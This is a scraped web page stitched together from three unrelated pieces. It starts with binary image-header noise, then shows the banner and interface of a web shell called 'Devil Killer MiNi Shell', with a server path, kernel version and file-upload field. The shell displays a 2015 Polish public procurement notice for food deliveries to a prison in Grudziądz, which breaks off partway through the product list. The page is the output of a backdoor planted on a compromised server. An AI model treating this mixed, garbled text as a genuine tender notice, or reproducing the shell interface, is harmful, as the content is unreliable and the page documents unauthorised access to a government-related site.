JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150603/81703-N-2015.html

<p class="kh_header"><b>Grudziądz: Dostawy różnych artykułów spożywczych dla Zakładu Karnego Nr 1 w Grudziądzu</b><br>
<b>Numer ogłoszenia: 81703 - 2015; data zamieszczenia: 03.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny Nr 1 , ul. Wybickiego 10/22, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 64 40 400, faks 56 64 40 499.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy różnych artykułów spożywczych dla Zakładu Karnego Nr 1 w Grudziądzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cz.1 
ARTYKUŁY ZBOŻOWE - przedmiot zamówienia:

Lp.	Nazwa artykułu		Norma	Ilość
1.	Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo - mącznych i innych pozostałości		PN-A-74022	14 500 kg
2.	Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi ziemniaczanej;
- postać i barwa - biały proszek;		PN-A-74710	30 kg
3.	Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg;		PN-A-74131	6 000 kg
4.	Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg;		PN-887A-7403	4 000 kg
5.	Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych pozostałości;		PN-88/A-74203	3 000 kg
6.	Ryż biały:
- opakowanie - 1 kg - 25 kg;		PN-A-74220	10 500 kg


Cz.2 
BULIONY - przedmiot zamówienia:
Lp.	Nazwa artykułu		Norma	Ilość
1.	Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-75980:1997	3 500 kg
2.	Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-97052	2 500 kg
3.	Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	10 kg
4.	Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050:1996	400 kg
5.	Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	400 kg
6.	Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94052	4 000 l
7.	Przyprawa jarzynka w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy		PN-A-94050	1 000 kg

Cz. 3
CUKIER - przedmiot zamówienia
Lp.	Nazwa artykułu		Norma	Ilość
1.	Cukier biały kryształ:
- opakowanie max. do 25 kg;
- termin przydatności do spożycia - 
6 m-cy od daty dostawy;		PN-A-74850	7 500 kg

Cz.4
RÓŻNE ARTYKUŁY SPOŻYWCZE I PRZYPRAWY - przedmiot zamówienia
Lp.	Nazwa artykułu		Norma	Ilość
1.	Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	BN-79-8133-01	80 kg
2.	Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-88036:1998	250 kg
3.	Chilli w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-86955	20 kg

4.	Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-R-87022	20 kg

5.	Cynamon w proszku w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-86955	10 kg

6.	Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-88115:1998	250 kg
7.	Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-94051	650 kg

8.	Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86967	30 kg

9.	Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-94/A-75104	120 kg

10.	Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-ISO 3720	1 000 kg

11.	Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-94013	2 500 kg

12.	Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-94051	120 kg

13.	Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-81/A-79734	50 kg

14.	Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-R-87022	50 kg

15.	Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86958	50 kg

16.	Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86950:1995	2 000 kg

17.	Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86964	3 000 kg
18.	Ocet 10% 0,5 l	PN-72/A-79733	1 400 l

19.	Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86955	60 kg

20.	Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-86965	180 kg
21.	Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-94017:1998	10 kg

22.	Przyprawa do mięsa mielonego:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	BN-67/8132-14	20 kg

23.	Sól kuchenna:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-C-84081	4 000 kg

24.	Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	BN-67/8132-14	50 kg

25.	Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;	PN-A-82245:1993	100 kg

Cz. 5
PRODUKTY SOJOWE - przedmiot zamówienia
Lp.	Nazwa artykułu		Norma	Ilość

1.	Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-ISO 5506	700 kg

2.	Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-ISO 5506	500 kg

3.	Kotlety sojowe:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-ISO 5506	200 kg

Cz. 6
PRODUKTY STRĄCZKOWE - przedmiot zamówienia
Lp.	Nazwa artykułu	Norma	Ilość
1.	Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-75/R-65031	4 500 kg
2.	Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;		PN-A-74220:1997	3 000 kg

Cz. 7
PRZETWORY WARZYWNE - przedmiot zamówienia
Lp.	Nazwa artykułu	 	Norma	Ilość
1.	Chrzan tarty:
- opakowanie jednostkowe- słoiki do 0,9 l
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 		         PN/R-75520	50 kg
2.	Fasolka konserwowa:
- op.2500- 3000 ml, długość ok. 5 cm, kolor zielony, bez łyka, zalewa klarowna;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	     PN-V-74016:2001	200 kg
3.	Groszek konserwowy:
- op. 2500-3500 ml, kolor zielony, soczysty, ziarna całe, nie zepsute, bez obcych zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-76/A-77803	1 200 kg
4.	Koncentrat pomidorowy 30%:
- opakowanie - puszka 4500g;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 		PN-75/A-77601	7 500 kg
5.	Kukurydza konserwowa:
- op. 2500-3000 ml, ziarna młodej kukurydzy luzem w zalewie konserwującej, ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania, konsystencja miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	
PN-A-77807	
800 kg
6.	Leczo pieczarkowe:
- produkt spożywczy otrzymany ze świeżych warzyw i grubo pokrojonych pieczarek z dodatkiem soli kuchennej, utrwalony przez pasteryzację;
- konsystencja - półpłynna do gęstej, z widocznymi kawałkami warzyw i pieczarek;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 		PN-A-86951:2006	2 000kg
7.	Ogórki konserwowe całe:
- op.2500-4000 ml, termin przydatności do spożycia min. 12 miesięcy, produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym, struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych;	PN-A-77801 	2 000 kg

Cz. 8
PRZETWORY OWOCOWE  - przedmiot zamówienia
Lp.	Nazwa artykułu		Norma	Ilość
1.	Dżem:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;		PN-A-75100	50 kg
2.	Miód:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	PN-88/A77626	50 kg
3.	Dżem:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; 		PN-A-75100	6 500 kg
4.	Marmolada:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;		PN-93/A-75103	6 500 kg
5.	Kompot truskawkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd -widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu truskawkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy; 	PN-75/A-75953	800 l

Warunki i zasady realizacji zamówienia:

- Wykonawca zobowiązuje się dostarczyć na własny koszt przedmiot umowy - przetwory warzywne i owocowe - 
do Zakładu Karnego Nr 1 w Grudziądzu w ilościach zgodnych z zamówieniem złożonym dwa dni przed terminem dostawy. Środki transportu, którymi będzie dostarczany towar powinny spełniać wymogi określone w ustawie 
o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (t. j. Dz. U. z 2010, Nr 136, poz. 914 z późn. zm.).
- Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia zamówienia do 20% dla poszczególnych produktów od szacunkowej ilości określonej w SIWZ oraz formularzu ofertowym oraz opisie przedmiotu zamówienia. Niemniej łączna wartość zamówienia z uwzględnieniem powyższych zmian, nie może przekroczyć wartości niniejszej umowy określonej w tym formularzu ofertowym, która jest tożsama z ceną. Zamawiający zastrzega sobie prawo zmniejszenia końcowej łącznej ilości zamawianych artykułów do 20% od całości zamówienia. Z powodu zamówienia przez Zamawiającego ilości mniejszej niż ilość szacunkowa wymieniona powyżej (pomniejszona do 20%) Wykonawcy nie przysługują żadne roszczenia finansowe ani prawne.
- Dostawę towaru ustala się wg potrzeb, nie częściej jednak niż  dwa razy w miesiącu w godzinach 7.00 - 12.00 pojazdem o wysokości do 4,00 m, o długości nie przekraczającej 10,00 m. W przypadku, gdy dzień dostawy przypada w dzień wolny od pracy (np. święto), termin dostawy może zostać przeniesiony na inny dzień roboczy po uzgodnieniu tego z wykonawcą z przynajmniej dwudniowym wyprzedzeniem. 
- Wykonawca zobowiązuje się do sprzedaży artykułów spożywczych pełnowartościowych, świeżych, zgodnych 
z Normą Polską lub zharmonizowaną Normą Europejską oraz z Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi 
z dnia 10.07.2007 r. w sprawie znakowania środków spożywczych (Dz. U. z 2007, Nr 137, poz. 966), 
a w szczególności musi zawierać: nazwę środka spożywczego, dane identyfikujące producenta środka spożywczego, datę minimalnej trwałości lub termin przydatności do spożycia, warunki przechowywania, jeżeli oznakowanie środka spożywczego zawiera informację o terminie przydatności do spożycia oraz w przypadku, gdy jakość środka spożywczego w istotny sposób zależy od warunków jego przechowywania;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.10-0, 15.61.31.00-8, 15.61.41.00-6, 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3, 15.83.12.00-4, 15.83.10.00-2, 15.61.33.11-1, 15.87.10.00-4, 15.87.12.00-6, 15.87.10.00-4, 15.88.20.00-4, 15.62.00.00-0, 15.87.10.00-4, 15.83.31.00-7, 15.86.30.00-5, 15.86.10.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin realizacji reklamacji - 15</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl link-zamówienia pyubliczne/OISW Bydgoszcz/Zakład Karny Nr 1 Grudziądz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny Nr 1 Grudziądz, ul. Wybickiego 10/22, 86-300 Grudziądz-dział kwatermistrzowski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2015 godzina 12:30, miejsce: Zakład Karny Nr 1 Grudziądz, ul. Wybickiego 10/22, 86-300 Grudziądz-sekretariat I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu		Norma	Ilość
1.	Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo - mącznych i innych pozostałości		PN-A-74022	14 500 kg
2.	Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi ziemniaczanej;
- postać i barwa - biały proszek;		PN-A-74710	30 kg
3.	Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg;	PN-A-74131	6 000 kg
4.	Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg;	PN-887A-7403	4 000 kg
5.	Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
